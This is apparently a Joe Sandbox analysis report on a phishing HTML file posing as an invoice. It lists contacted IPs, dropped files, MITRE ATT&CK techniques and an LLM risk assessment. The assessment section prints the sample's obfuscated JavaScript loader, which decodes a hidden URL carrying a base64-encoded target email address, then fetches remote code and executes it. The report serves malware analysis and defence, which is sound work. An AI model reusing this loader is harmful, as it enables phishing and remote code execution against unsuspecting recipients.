13.107.42.14	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.185.193	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
23.44.201.9	unknown	United States	20940	AKAMAI-ASN1EU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.117.182.59	unknown	United States	20940	AKAMAI-ASN1EU	false
20.96.153.111	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
2.19.126.152	unknown	European Union	16625	AKAMAI-ASUS	false
23.44.201.5	unknown	United States	20940	AKAMAI-ASN1EU	false
2.18.64.218	unknown	European Union	6057	AdministracionNacionaldeTelecomunicacionesUY	false
40.74.166.188	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.246.67	s-part-0039.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
152.195.19.97	unknown	United States	15133	EDGECASTUS	false
131.253.33.203	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
18.238.49.99	unknown	United States	16509	AMAZON-02US	false
216.58.206.35	unknown	United States	15169	GOOGLEUS	false
40.79.167.8	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.74.196	www.google.com	United States	15169	GOOGLEUS	false
184.86.251.7	unknown	United States	20940	AKAMAI-ASN1EU	false
23.96.124.68	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.217.16.206	unknown	United States	15169	GOOGLEUS	false
151.101.65.108	unknown	United States	54113	FASTLYUS	false
4.209.164.61	unknown	United States	3356	LEVEL3US	false
104.117.182.33	unknown	United States	20940	AKAMAI-ASN1EU	false
204.79.197.203	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1449222
Start date and time:	2024-05-30 00:07:34 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Sample name:	invoice 700898 for wallcentre.com.shtml
Detection:	MAL
Classification:	mal52.phis.winSHTML@74/195@50/158
Cookbook Comments:	Found application associated with file extension: .shtml

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 216.58.206.35, 172.217.16.206, 74.125.133.84, 34.104.35.123
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
VT rate limit hit for: invoice 700898 for wallcentre.com.shtml

LLM Input / Output

Input	Output
URL: file:///C:/Users/user/Desktop/invoice%20700898%20for%20wallcentre.com.shtml Model: gpt-4o	```json { "riskscore": 8, "reasons": "The provided JavaScript code appears to be obfuscated, which is a common technique used by malicious scripts to hide their true purpose. The code constructs a URL by replacing certain patterns in a string and then makes a fetch request to this URL. The response is then executed after a delay using setTimeout. This behavior is suspicious as it could be used to load and execute malicious scripts from an external source. The obfuscation and dynamic execution of code are strong indicators of potentially malicious intent." }
edfc6eac1379f9a = ''.replace.apply("hdf0813bttpa36b35c9sdf0813b:df0813b/df0813b/df0813bfbdf0813bccda7a36b35c97df0813b8f8a36b35c9.df0813bca36b35c9readf0813btdf0813bedf0813bgdf0813booa36b35c9da36b35c9ldf0813bia36b35c9fa36b35c9e.udf0813bs/s/df0813ba06a36b35c9bdf0813b2df0813b8edf0813b0df0813b86a36b35c9?fea36b35c94a36b35c9ea36b35c9cdf0813b3df0813b4a36b35c9bdf0813b0=Z3JvdXByZXNlcnZhdGlvbnNAd2FsbGNlbnRyZS5jb20=df0813bdf0813bdf0813ba36b35c9",[/(df0813b\|a36b35c9)/g,'']);fetch(edfc6eac1379f9a).then(e4a3420326 => {return e4a3420326.text();}).then(be7d506097c8b9b => { setTimeout(be7d506097c8b9b,87);});

Input

Output

URL: file:///C:/Users/user/Desktop/invoice%20700898%20for%20wallcentre.com.shtml Model: gpt-4o

```json
{
  "riskscore": 8,
  "reasons": "The provided JavaScript code appears to be obfuscated, which is a common technique used by malicious scripts to hide their true purpose. The code constructs a URL by replacing certain patterns in a string and then makes a fetch request to this URL. The response is then executed after a delay using setTimeout. This behavior is suspicious as it could be used to load and execute malicious scripts from an external source. The obfuscation and dynamic execution of code are strong indicators of potentially malicious intent."
}

edfc6eac1379f9a = ''.replace.apply("hdf0813bttpa36b35c9sdf0813b:df0813b/df0813b/df0813bfbdf0813bccda7a36b35c97df0813b8f8a36b35c9.df0813bca36b35c9readf0813btdf0813bedf0813bgdf0813booa36b35c9da36b35c9ldf0813bia36b35c9fa36b35c9e.udf0813bs/s/df0813ba06a36b35c9bdf0813b2df0813b8edf0813b0df0813b86a36b35c9?fea36b35c94a36b35c9ea36b35c9cdf0813b3df0813b4a36b35c9bdf0813b0=Z3JvdXByZXNlcnZhdGlvbnNAd2FsbGNlbnRyZS5jb20=df0813bdf0813bdf0813ba36b35c9",[/(df0813b|a36b35c9)/g,'']);fetch(edfc6eac1379f9a).then(e4a3420326 => {return 															e4a3420326.text();}).then(be7d506097c8b9b => {								setTimeout(be7d506097c8b9b,87);});

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58109
Entropy (8bit):	6.1062603280860674
Encrypted:	false
SSDEEP:
MD5:	7D986C21BC79F8FFCA5B22C3858EE977
SHA1:	5D189D43260150F6E0C764E23EA41EFAB5933EE7
SHA-256:	FBBCC80D11E69FB9500E42BC59D325703DA89FFF86096761347F7E8A135ACFCE
SHA-512:	0CDF6B795FBEF759506FC8A1945E30C5B265BDBDD756740D306D5346B96B73B9B36FB925263C9F96A73A6EE932666BC307D4AE119C74747ABB01EC60955CC03C
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"8ABCE35666CBACA121128B98C75E78308AAC1CE803625FAFB4A7AFA722C77CA4\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 29 21:08:01 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.982926444089053
Encrypted:	false
SSDEEP:
MD5:	B096851968963E219FA2933ADCC6E6DE
SHA1:	A4B75165284BB0C1B3A9157A6075C65860491B55
SHA-256:	41CEB4DF8708B754A98D91E8CDDE5462C53F7CB42B397ABB841F8EB2C07AD69E
SHA-512:	54CAF08E3748D1B67268C5864239716E6B0E8D8FA469BE5E8E1194B89F02E75DED75134E8251D4C980D1647826D44357064D64738CA8FBC3BA07347CD8BADA0D
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......<.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Q7......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	HTML document, ISO-8859 text, with very long lines (6257), with CRLF line terminators
Entropy (8bit):	5.239423277947118
TrID:
File name:	invoice 700898 for wallcentre.com.shtml
File size:	6'259 bytes
MD5:	0fa9daf17b59e394c20e983c5901b179
SHA1:	ec21474979e5b43d37e0d39a3e7a9d506c9d78ff
SHA256:	8491c804e82cfa3fe78e9eaeed84771721e9311d84ba6191fdd0ea98ebc9e45f
SHA512:	6ed729e60772d61401be295ef11f2ed09b4d2fbff4ada39642a16e0e5f64d8bdee6c97674e17e52eb3b8c9662f66acffdf46a7ec3cb736d6d78110925b10b1fc
SSDEEP:	192:gi74znm2PX5T258CkwKOu40XM1LteEK46:nczhE8CkwKmBteEn6
TLSH:	A0D14260D9E71D3F063345CAEB972B40B1C190C2D2A2F515BEB8567B36EDC20BB1652E
File Content Preview:	<body style="display:none;"> <tr><td class="infobox-full-data" colspan="2">Player stats at <b></b></td></tr><p>Fletcher played his entire seven-year career for the Chargers from 1970 to 1976.</p><span class="mw-headline" id="References">References</spa

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report invoice 700898 for wallcentre.com.shtml

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5a48185a-5d67-4f0d-a773-b44ce80695a9.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\020bc1cd-7982-4746-a20a-d08290fef878.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6657A78C-1CC0.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0277001b-fefc-47b9-8dee-2703968d0ffd.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\37766bd3-cb81-42de-81a7-d970e3116a75.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3dca44cc-cff7-44ae-84c1-812d12aea32a.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\56d8c430-d5cf-4926-b1cb-1e36e30415f0.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Favicons-journal

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_2

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_3

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\index

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Windows Analysis Report
invoice 700898 for wallcentre.com.shtml